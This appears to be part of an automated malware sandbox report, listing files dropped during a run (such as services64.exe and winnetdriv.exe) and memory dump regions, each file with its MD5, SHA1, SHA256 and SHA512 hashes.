SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/776-127-0x0000000000240000-0x0000000000246000-memory.dmp

memory/776-128-0x0000000000500000-0x0000000000520000-memory.dmp

memory/776-129-0x0000000000250000-0x0000000000256000-memory.dmp

memory/2884-130-0x0000000000860000-0x000000000094E000-memory.dmp

memory/2992-131-0x00000000012E0000-0x0000000001422000-memory.dmp

memory/2144-137-0x000000013FF50000-0x000000013FF60000-memory.dmp

memory/868-140-0x0000000000740000-0x0000000000824000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1972-151-0x00000000004D0000-0x00000000005B4000-memory.dmp

memory/2992-164-0x0000000000520000-0x0000000000532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab18B1.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar18C3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2776-211-0x0000000000400000-0x0000000003346000-memory.dmp

memory/2576-217-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-216-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2576-215-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2576-214-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-213-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2576-212-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/572-218-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/2576-226-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-224-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2576-221-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2576-220-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/2576-228-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-227-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2144-229-0x0000000000150000-0x000000000015E000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2588-233-0x000000013FCA0000-0x000000013FCB0000-memory.dmp

memory/2992-234-0x000000000A950000-0x000000000A9DC000-memory.dmp

memory/2992-235-0x00000000009F0000-0x0000000000A0E000-memory.dmp

memory/868-245-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/868-242-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-240-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-238-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-236-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-247-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-246-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3e7329584175cbc758e7e3abc47bfd76
SHA1 2a5cff072407f0686539066dc8f3d4047f81c45a
SHA256 9384e1553e95a1fac60889b7de3ba45c8f73b7a69e89b649550ad817106185d2
SHA512 9d8ced048858a9b74a7a945c50281867c116c43a3437b51168bf61660ab448001f30275dc800741892c6447651da54a4ccb4f7967330df930f2c0962dc62030f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 434577d3d07c08cd087ab920d81f4071
SHA1 de405aa83c5b09a2516c137e73931d70dc6b36db
SHA256 5cbc2e66ae51d37f8b60038d286fae0f2a256ee3a258569298e2da582a51fb9c
SHA512 fd45225ff66a8da2ad9769c930593eed034817ad119c0a261148caee2c49cdae78eb604b9f6ea0c2caeadebde723348347146785c4084ef1c8f9c521d20b2b10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 836313218eaf8d2ce9f0c06496b6da89
SHA1 38ff7f78fe08c344f23b5a814965f1af87bdf09e
SHA256 caab9e5d39069eec471855ab39ff0a655f7328a46dce5e48b0ddad93a1169cd0
SHA512 86fdff68aa7ecda6428bc37f85f4319fd28689881628fa42e8fe1af3b51fe6880f16320d9054c7182afe196a031a721f233e77ff270e8972caa98c915cf1606a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3c0d6c7b3adfa3f3d8a6a96d5569c0b6
SHA1 5b7d338acb8444db8d60460a98430b3eb2d74871
SHA256 4ec6a12ca3ed5b81276724974c1e98a4962fc9a0f22522d1133a82e136ff8020
SHA512 0971a178fc3c0336fdf9ad1dc55cd6ef8233078a2f61c094f69019163635d9b5ce10bd0fd339858cc395661f42db716a37181e4a21dee0e424b50aca7f40fc1d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ad443acde060ab1a1238cb82766dc300
SHA1 f5d2284bb7ca93f38a827606592a4fc2f4650cff
SHA256 a8081a72eb7dab7eb2daa270211614b5a5fb7013b2a667804cf6f43b7b925a86
SHA512 28bc0a1a4638ecf37436bee260e7b48b8accf437dfe47a38b728da0c4c4abb46d05ec24f076fa730b3a9fcc4920aca99e683f7c45ca70da62063cdc5117f2393

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 d7a9ea27ca1c01b7a92aa446b93510c7
SHA1 5afdcb45bd5ed2228f35fb659373de8fb207aefc
SHA256 a660b13139d7e458b7033054ab04aa0030a51ac405b448a455787e36f86a38aa
SHA512 b84f9cbf0e6afd64797f289fb6d846d9a92dcd12f0f477c940e347e5220b9466535f78824010d5cda9e2a8a4b6621d1cd19553973e1842fefa2971094e3eeb46

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 75ba1a9531c1dc5eb48264657c726fb4
SHA1 bb7919dd5da463636cc463107105e38cc42105ec
SHA256 c8eb1841aa40eeeb6721f256e16f12e809d72f23946f632fc5bd9994681bfd1c
SHA512 d2b3b3f5dd6746294e40d000cd979931bb35956a1ce2973c64c5d330a2bd29553203cc7a715e027140abdcb8c2a769a1bc9573b5ba853b27bc1d5dc0086b8bf2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3a02ed9061469b2bbf59dd574e234b7f
SHA1 12fb2ae7f2ad90effb6faf88b5361248e458c91e
SHA256 2d0e6e6c260f688363edf3fb5c579d25eb1641aab69713647e518186daef0480
SHA512 e48b6cfa786afc7a320871f87f02886cbcf59ed98e92288f6f1092a041ce8db78a267d64c9ba6373116d6f0808a4fb1f20700ddd7a1510fccd6f89fcc440e1ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9d3aeda873ddb7aa9bac38077365fdde
SHA1 71584b74b6fc809dfc561da4912f87320e9e7a37
SHA256 e57c7b8d27adbf2d1e909b4b50705a7fd3c425ea4ed60a0842ccd20a65829073
SHA512 b2b9e01b4ed2baa4e0f863a50ec269dd9eb713b21afc079d7d0658feba4091937cfbdbe0108857bc4938861663519f0e945551dad74bedb43d9d25abe69f34b1

memory/692-778-0x000000013F3A0000-0x000000013F3A6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 40f0bdae7c15f8265c8483a8e86b6a53
SHA1 e6c0f2b36bba39022f479e53fa553b6b65dd1457
SHA256 442a8e6a9dcd5187542f3e3305aff6af68c5c7e5fdc44159e632aaafc53aa945
SHA512 10c45af49a2786e61cee8983b3c2e21f09c05cd7932cdbce6d32cf69158e268b7958209435d3e6d34c4b559da4d7fa352846f6b4cad48f145d9df39ab5235a4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52fb5a2496b66b6fa9f08f70675c5ace
SHA1 9bd89b9d7d09a2f6f45f4fe8b496283c3c81d59c
SHA256 2dd68a16d3e92c626682aaa2d1b76b8c5950ac532ced1011cb2d3594af7ad5ad
SHA512 5e6137157f234caa82d3e3df73a2c1fcf40cf6371e1e4a67f6b5822a1a48ba9780225a43668961be7bd379b94dfcd2161b8ef9d7dcecad22f50f224807b50961

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a805c8fc9ffe0e0529b3727e6e473b06
SHA1 5f571e6923283310b7508a0ea462027cfbf1da1f
SHA256 d4a67ea79d767efb67d45dd8569897e39c7c1eb51ffc4352dc3a6fee1849df80
SHA512 1d9fb75d8b9c684ac7b718bf2b790c1e5b6aba63e734a5b7878b63d79559084d5d6353769a61bc18e90a2fc83bddb2082d0b8f4d0496a1b50442f2ad963eb8e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7963f098763d48e797add104eef7038b
SHA1 cefe6adea2c4a324c0f96f2db369f16d9d78a0f9
SHA256 7e7d740f36d2a33192e4eb33e38207ed3f307599399c9b7010a71d1582e5a932
SHA512 5062989676ac17d490b4e3ff8bd005bebaea4968642f683f5abf38501c9a7908ec4bb91b6d553f02b743c6f5d29b8535aa1a58e61654542a9b829985e0e6e48e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8609a36f422f530aee8e51d163c8df63
SHA1 a929b762f9b893a8fc55cb40916e22b63e236c3f
SHA256 498cfe2071271c1bb3bb717f4cdc9a0a7a3911baca64f4bd06debcc5d20c8b7b
SHA512 9824ad6292b09c11f3acb483d1abf253a9ec069d7e328c61cf87271dbfd867e5f7d674fceadd46e9462c992361c2d2251689e164e4f1f0aed06269e55bcf61e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 34085e3914f574aebead46fa6e5f1fd6
SHA1 4f1c6767d8531a907dcc9f6f6b3059a33c063872
SHA256 18ba57c5ff1bfa145716a52e7715818546f89026826e91771b27ea897e070133
SHA512 b71a6e30af92ae1a7f26af90bb96db15e24b996842bdb3f8877d5a5d527529d10abc35a4d4ddc40ea9183bd60fd45a14a0ed0d53627bfb3de0c36f75425e6ed5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7b6ead6881cd1beaa749b8afbc40f7b4
SHA1 105881d84093bad34fd1d49ebbcffffb782ed725
SHA256 8deac1a9c56f84999ea70ecb5a81b644114292bc0539191825f776241accc1b8
SHA512 1c9288e6da30870f732e2f84c7c4d3d9f5c6fbb573e305109b9d683baff7a9a23fda5f583d9fea4d93542065ff6d66d3d11c4e7ffb7ad05d92a1b9065db79098

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c4519739a0e15209c0e9bcc147823ef4
SHA1 ab56e2f69327a7a775945f1d33f556be4e2ef0cb
SHA256 073c0f527f2b63fb93bd54efaae93969b227c6dc203436f42d74707a1af4ac1e
SHA512 d3dcf4e94a5a71165f39e79d35e307f0e3aa2b9f60888fd11a63358505032ac981910e9f6bc5ccd8377c0bca4c9799d4afcdb59b3eb29adc5c8b9d3907c692c1